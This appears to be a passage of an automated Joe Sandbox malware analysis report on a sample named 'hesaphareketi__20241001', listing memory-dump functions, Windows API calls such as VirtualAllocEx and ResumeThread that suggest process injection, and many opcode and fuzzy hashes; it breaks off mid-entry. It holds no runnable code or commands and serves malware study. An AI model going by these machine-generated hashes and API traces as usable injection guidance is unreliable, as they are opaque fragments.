                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: b939c4b52f6c970b3f7188c89e1857810e1e127ac856f536058d982a5818bafc
                                        • Instruction ID: d16bccd292af9df5b3579906192ea0d73c09aae64cebb398dd2bd32cc69ef064
                                        • Opcode Fuzzy Hash: b939c4b52f6c970b3f7188c89e1857810e1e127ac856f536058d982a5818bafc
                                        • Instruction Fuzzy Hash: 381158B1C002498FCB20DFAAD4457EFFBF5EF88324F20881AD519A7240CB79A541CBA1
                                        Function 07A346A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A34716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: a03467cacb3b8b91ae4a80468937d6787f75c14d8b59befaaf7af31973f51021
                                        • Instruction ID: d2a2f888809238fef12f5a0d994f34ee35b32f6e62ab82170b35f5aafdbfc5bd
                                        • Opcode Fuzzy Hash: a03467cacb3b8b91ae4a80468937d6787f75c14d8b59befaaf7af31973f51021
                                        • Instruction Fuzzy Hash: F31137B58002499FCB10DFAAC844AEFBFF5EF89310F208419E519A7250C779A540CFA1
                                        Function 07A33CB0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 9fb45cecd747215d1a505f41f65ab79810c67966ab4cda1a080645f0c05653b2
                                        • Instruction ID: 065ee1d63a876d68bbe9b5b94b77ab38c19710e325a0b0d46cb53adcd3f40357
                                        • Opcode Fuzzy Hash: 9fb45cecd747215d1a505f41f65ab79810c67966ab4cda1a080645f0c05653b2
                                        • Instruction Fuzzy Hash: 801136B1D002498FCB20DFAAC4457EEFBF5EF88324F208819D519A7240CB79A944CBA1
                                        Function 07A371F8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A3725D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 78d5f5b61fb601f3eb6f79e332680a5f50ab134b0e70e51b69865e3d44536ae8
                                        • Instruction ID: d44b0a6e97fde6efc29a8502cbb08245056b134ba96951f0f49405605c18e6c7
                                        • Opcode Fuzzy Hash: 78d5f5b61fb601f3eb6f79e332680a5f50ab134b0e70e51b69865e3d44536ae8
                                        • Instruction Fuzzy Hash: E211F2B5800249DFCB10DF99D984BDEFFF8EB58724F20841AE558A7641C3B9A544CFA1
                                        Function 015DAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015DAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 61ff7c541793edb1f48c8e6b4458bdddaeb36d99bc2a6709dd9271dc800f946b
                                        • Instruction ID: 999dd1d40b90283646c3987cee01038b73b67d9b42c9c3ff3933bbe38c9c91b8
                                        • Opcode Fuzzy Hash: 61ff7c541793edb1f48c8e6b4458bdddaeb36d99bc2a6709dd9271dc800f946b
                                        • Instruction Fuzzy Hash: BD110FB5C002498FDB20CF9AC444ADEFBF5EB88214F10845AD528A7214D379A545CFA1
                                        Function 07A32FF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A3725D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: d3759daaf59e6251cd570c785689c325e2396ce598a2f6bd3c749225e2eef59b
                                        • Instruction ID: caacf900f03022a490f6d55f9c63721c400338b4a5ac9d4234f809eec83558dc
                                        • Opcode Fuzzy Hash: d3759daaf59e6251cd570c785689c325e2396ce598a2f6bd3c749225e2eef59b
                                        • Instruction Fuzzy Hash: 6F11F5B5800349DFDB10DF99C484BDEFBF8EB48320F10841AE528A7201C379A944CFA5
                                        Function 07571930 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: b6306455029fb85cb159e2cf7a8f86c7d5cabf24d24af8c99618cf3dcd7f7a71
                                        • Instruction ID: d0998cd208f19f2da3c8ea7395be0b5a268325a921ff65792a7fa462112927cd
                                        • Opcode Fuzzy Hash: b6306455029fb85cb159e2cf7a8f86c7d5cabf24d24af8c99618cf3dcd7f7a71
                                        • Instruction Fuzzy Hash: EF41B371B1061A8FCB04DF7998449AEBBF6FFC4210B148569E419DB350DF30DD068790
                                        Function 0757F6E2 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        • Opcode ID: 7f177dd7dd8f0672f74dc2cd9bcd6ad6ef340571c163676841067d794b163d3e
                                        • Instruction ID: 808415f4ba59505b63e1b4393f46643cbef7eedc9728857e9f062fede6757722
                                        • Opcode Fuzzy Hash: 7f177dd7dd8f0672f74dc2cd9bcd6ad6ef340571c163676841067d794b163d3e
                                        • Instruction Fuzzy Hash: 84416FB4928205DFD704CF6AE4448EDBBB9FB8F301B14D556E819A7292CB309946CFA0
                                        Function 07571FC4 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 0e5f4fefde6df98cb04ef581cb9ed2603301a145ed52a9c17f312fbd92d8d8c7
                                        • Instruction ID: 7441c1ea7ff11ed00ba5d4b7de26726f77210bfa6d0d76f2855ccbb6b7207f8e
                                        • Opcode Fuzzy Hash: 0e5f4fefde6df98cb04ef581cb9ed2603301a145ed52a9c17f312fbd92d8d8c7
                                        • Instruction Fuzzy Hash: CA4112B0D012099FDB20DF99D988BDDBBF5FF48314F24806AE008AB350C7B59945CBA1
                                        Function 0757B4A1 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: uIA1
                                        • API String ID: 0-3125954435
                                        • Opcode ID: 87bff131c40d4d0b879f77f288020dc2dc06d5b35c858a20670726f3810b1ecb
                                        • Instruction ID: ec9a64423b2bdebb854109c1ae380445a57a84e6188336dd63af1fea2ef1505c
                                        • Opcode Fuzzy Hash: 87bff131c40d4d0b879f77f288020dc2dc06d5b35c858a20670726f3810b1ecb
                                        • Instruction Fuzzy Hash: 2C3154B0E29219DFCB04CFA9D44569EFFF2BB8A310F54D5AAD401AB251EB348A41CF51
                                        Function 0757F711 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        • Opcode ID: a43ef68494a23cb8cbec7c9288016a9c21ef2ea4de798a912be937e11ae00ddf
                                        • Instruction ID: 1a4b27d20f9ef6085e7f8867a981ff5a56a7ce5185b10252febd65ac8cb7e4fd
                                        • Opcode Fuzzy Hash: a43ef68494a23cb8cbec7c9288016a9c21ef2ea4de798a912be937e11ae00ddf
                                        • Instruction Fuzzy Hash: 333119B4D29215DFDB08CFAAE4544ECBBBABB4E301F10D45AE41AB72A1DB309506CF51
                                        Function 0757B4B0 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: uIA1
                                        • API String ID: 0-3125954435
                                        • Opcode ID: 33a1daa814e5d317b870983f6b8a61693334fa51e66d9f79008325c6164483a2
                                        • Instruction ID: 63d9ea171ca0cf654391348222f6b26dddb09ea7065329b69efb616cfda076ab
                                        • Opcode Fuzzy Hash: 33a1daa814e5d317b870983f6b8a61693334fa51e66d9f79008325c6164483a2
                                        • Instruction Fuzzy Hash: D73143B0E24219DFCB08CFA9D5856AEFBF6FB89300F50D56AD415A7250EB349A41CF50
                                        Function 07571D40 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: f4bf11172ddf7283ff81ea0d8563031d8e2ad0e9ed665393201051545edcb2b0
                                        • Instruction ID: f05dd0514f499ac60ab97b86ea4aba1431572def52c5a920d4cd3a2133c0bcb1
                                        • Opcode Fuzzy Hash: f4bf11172ddf7283ff81ea0d8563031d8e2ad0e9ed665393201051545edcb2b0
                                        • Instruction Fuzzy Hash: F81121B1B0060A8BCB54EFB9E9519EEB6F6BFC4611B50407AC515E7244EB358E02CB91
                                        Function 0757ECD5 Relevance: .2, Instructions: 215COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a23ab0d73136a698ff20964c0620a83a2dbd8df556f3ed5c23de12ee3c9f8f4
                                        • Instruction ID: 05a9040c788145aad48ef956bde3c0286228b03fa29bf7de8853c686a59395ff
                                        • Opcode Fuzzy Hash: 2a23ab0d73136a698ff20964c0620a83a2dbd8df556f3ed5c23de12ee3c9f8f4
                                        • Instruction Fuzzy Hash: EBA1E9B4915268CFDB10CF54E885AEDBBBABF49301F5598D6E80AA7351C731AD82CF10
                                        Function 0757E538 Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff4b46604edc68e29c12a4b279d46bc320b8d93bce328654b128628b8277ccde
                                        • Instruction ID: 83d9822083d4291b54781637c1efb7557c7f6fa128656dbb81d26d55c21139f7
                                        • Opcode Fuzzy Hash: ff4b46604edc68e29c12a4b279d46bc320b8d93bce328654b128628b8277ccde
                                        • Instruction Fuzzy Hash: 174118B4E19209CBDB08CF9AE4456EEBBF6BB8E301F14D069E419A7251DB349941CF50
                                        Function 0757E4E7 Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f8766edcf9b3b7a966b3445c6e1b956aaace2a8388a3540a16b1706e9d04974
                                        • Instruction ID: 20a75baf64c0f0b3ce65dc44278f6245c1c2db9048698d3c7ae5598c2aad88b7
                                        • Opcode Fuzzy Hash: 1f8766edcf9b3b7a966b3445c6e1b956aaace2a8388a3540a16b1706e9d04974
                                        • Instruction Fuzzy Hash: 8C4119B0D19309CFDB08CFA6E5466EDBBF6BB8A311F14E4AAE409A7251DB344941CF50
                                        Function 0757E528 Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d3f9bf17fa25f4cbd5f2765d984e0916dac4f799b2dd6501f0cf8df98fce011
                                        • Instruction ID: 2bbd94c19d0e15284d6b8f93bc8a6f42b16d34eead71a08a03e7ff4ec57480b1
                                        • Opcode Fuzzy Hash: 3d3f9bf17fa25f4cbd5f2765d984e0916dac4f799b2dd6501f0cf8df98fce011
                                        • Instruction Fuzzy Hash: 414119B4E19249CFDB08CB9AE4456EEBBF6BB8E311F14E06AE409A7251DB344941CE50
                                        Function 07574698 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3a664819aea4674c65ae9079e0f0516853f417ef8633fd54146e656298e8013
                                        • Instruction ID: 8db610184d54bac717a8ae65ffc283361e0479bde42d79bc53e168c0747960c4
                                        • Opcode Fuzzy Hash: a3a664819aea4674c65ae9079e0f0516853f417ef8633fd54146e656298e8013
                                        • Instruction Fuzzy Hash: FC3137B19002499FCF14DFA9D985ADEBFF9FF48310F10842AE919E7210D735A944CBA1
                                        Function 075797B0 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d83fed4ccec2aa9fd2d278635d6e9ae440659ba316b8b6f53f421a7c6d564259
                                        • Instruction ID: 9d9bdb42c984dc2228b94dada1bab5df7ae7029e1b82962ad9af02ed22421aeb
                                        • Opcode Fuzzy Hash: d83fed4ccec2aa9fd2d278635d6e9ae440659ba316b8b6f53f421a7c6d564259
                                        • Instruction Fuzzy Hash: E83124B4E20219DBDB08CFA9E4455EEBBF6FF89310F10942AE415A7354DB306941CF60
                                        Function 0757E6B2 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99c0c027a59928eeed2c6c851b13e67ef2b095703faf884ad3508398f1d31da0
                                        • Instruction ID: 50e9b7de611b765ccde5eec5dae7dff851b5f90cc4bf93dac9d561b2d81beada
                                        • Opcode Fuzzy Hash: 99c0c027a59928eeed2c6c851b13e67ef2b095703faf884ad3508398f1d31da0
                                        • Instruction Fuzzy Hash: 893183B4918389CFCB05CFA9E5865EDBFF5BB4A300F6491D6D404AB352D7709A40CB91
                                        Function 075797A2 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5195ebc48ec1a3b04408a5281aa9b9dbfd8d493aa4ed1e51aedce8d42aa0f506
                                        • Instruction ID: 0fe6cc258cd82002519793c82de6ad22418230c9ae07b98f9be104093d3bcf0b
                                        • Opcode Fuzzy Hash: 5195ebc48ec1a3b04408a5281aa9b9dbfd8d493aa4ed1e51aedce8d42aa0f506
                                        • Instruction Fuzzy Hash: 033113B4E10219DBDB04CFA9E8455DEBBF2FF89310F14942AE415A7350DB346941CF60
                                        Function 0757F668 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb647c068ad596723549e29f530f55e652930f99d09e1e859fc32666fde73c44
                                        • Instruction ID: 394bfe6d6155796ec3723ef47dca1afaef5bbc3cbc0d3e829daab096f09fc168
                                        • Opcode Fuzzy Hash: eb647c068ad596723549e29f530f55e652930f99d09e1e859fc32666fde73c44
                                        • Instruction Fuzzy Hash: 3E214CB5E18214DFD708CF6AE8048EDBBBABBCA301B44C12AE504A7291C7305906CFA0
                                        Function 0757F268 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd879ad920a790b98f93d0dfd6f60ca81ae5d4d81fe4276d40a4e616beafdf4f
                                        • Instruction ID: 1f951244a61ee903ae6b6c3a70b686d7779716b66db47cc33560b9e26785cb34
                                        • Opcode Fuzzy Hash: bd879ad920a790b98f93d0dfd6f60ca81ae5d4d81fe4276d40a4e616beafdf4f
                                        • Instruction Fuzzy Hash: A9312BB4929108CFDB14CF54E985DECB7BABF4E301F649595D40AA7295C731AD42CF20
                                        Function 0153D3D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cce79a2a60faae1b07ea6d98bb1f41bd39edc84ab8c0b4de970c0f4c3f76482
                                        • Instruction ID: 4017d3d1a5884eb6affb3d457f21ee10f1aeccd9d761d35d48a60291726a01c9
                                        • Opcode Fuzzy Hash: 5cce79a2a60faae1b07ea6d98bb1f41bd39edc84ab8c0b4de970c0f4c3f76482
                                        • Instruction Fuzzy Hash: 6E210071100204DFDB06DF98D980B6ABFB5FBC8324F60C569E9090F256C37AE416CAA2
                                        Function 0153D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cffa21f2f76861e2fec62c459f35fd37e394e4e5738a325a774117631c30998
                                        • Instruction ID: 3ec12c9a91ae9b7abad04b70e8e76d8a4f01af90f0618b48dc0fc10a0818aaaa
                                        • Opcode Fuzzy Hash: 8cffa21f2f76861e2fec62c459f35fd37e394e4e5738a325a774117631c30998
                                        • Instruction Fuzzy Hash: 8F21F171500240DFDB06DF58D9C0B2ABFB5FBC8318F60C569E9090F296C33AD416CAA2
                                        Function 0154D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22b9f4d3f2bc1dc4093e9fe9112a0cd2a7ebbcbba658bf784dc4bccf674d8a04
                                        • Instruction ID: 4ca1c2fe6b47f2ccf6882007124fa3fa233cece265550e9b77668ad671d93809
                                        • Opcode Fuzzy Hash: 22b9f4d3f2bc1dc4093e9fe9112a0cd2a7ebbcbba658bf784dc4bccf674d8a04
                                        • Instruction Fuzzy Hash: 8021F571608204DFDB05DF98D5C0B26BBB5FB94328F20CA6DE9094F356C33AD406CA61
                                        Function 0154D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a768e53fbaef019fe72fc2cebbb2973634005be5b33b93b403a9dd27557962ca
                                        • Instruction ID: 2dba4fa1a507636bd85d595871f153c065be8a0194f2b61607b9553e49dbc1f1
                                        • Opcode Fuzzy Hash: a768e53fbaef019fe72fc2cebbb2973634005be5b33b93b403a9dd27557962ca
                                        • Instruction Fuzzy Hash: FA210071604204DFCB15DFA8D984B26BFB5FB98318F20C96DD90E0F256D33AD406CA61
                                        Function 0757B3B0 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b3764242eca5483d1aabfbe82f49cb1e7312b57c1e94a068bdd1c172fbaed81
                                        • Instruction ID: a9ca979e554639c8dcf1d92df7a1c1de3a22551d6e9e87c3a85cfee87963bf5b
                                        • Opcode Fuzzy Hash: 8b3764242eca5483d1aabfbe82f49cb1e7312b57c1e94a068bdd1c172fbaed81
                                        • Instruction Fuzzy Hash: 0C216AF4D15209EFCB44DFA9E54569EBBF6FB88210F10C1AA9408A3384EB309A51DB51
                                        Function 07570415 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 058eef641e5d15b39013f5e2a01a5a234b157dd8865b34a33118de7cc60b10d0
                                        • Instruction ID: b6adb289bae844b772d4ab8764204d4faf5e10862440f7d3394ec74cc7b37ba9
                                        • Opcode Fuzzy Hash: 058eef641e5d15b39013f5e2a01a5a234b157dd8865b34a33118de7cc60b10d0
                                        • Instruction Fuzzy Hash: 191136303003124BE714AB6CD5553AA77E9AFC0714F00856EC089CF3D2CAFA584687A1
                                        Function 0757E6D8 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b09512bb7d4169ed1a1793ff4f9b60b43f6760a3f17a984741d28a7ec77526d
                                        • Instruction ID: c5d7daa76aefc47f61192a6287082dba0209ebbc0a18f92908051ff06737a8db
                                        • Opcode Fuzzy Hash: 0b09512bb7d4169ed1a1793ff4f9b60b43f6760a3f17a984741d28a7ec77526d
                                        • Instruction Fuzzy Hash: EE211DF4D14249CFCB44CFA9E5829EEBBF9BB49300F609495D809A7351D770AE40CB91
                                        Function 07571FD0 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48b3bc5dbb078ed10ae326446328cd582f3cc4570429b4270d2b1d8239ad65ef
                                        • Instruction ID: 4f95df95c1a14b0db1a2ba3ec4547182f9f2bfa16d684974aa7d8e9e7e32d1ba
                                        • Opcode Fuzzy Hash: 48b3bc5dbb078ed10ae326446328cd582f3cc4570429b4270d2b1d8239ad65ef
                                        • Instruction Fuzzy Hash: 6C21A0B0C01218DFDB20DF9AD588BDEBBF5BB48314F24845AE408BB290C7B55945CFA1
                                        Function 07577008 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c304515f05da038c5535e729a8fac970cc87caebe4d8b0525cdaecd9d5c1a9b2
                                        • Instruction ID: f40efd85a054a1d908b070d7caa04456aa19347202b3cfc4406a7d6fb38c639d
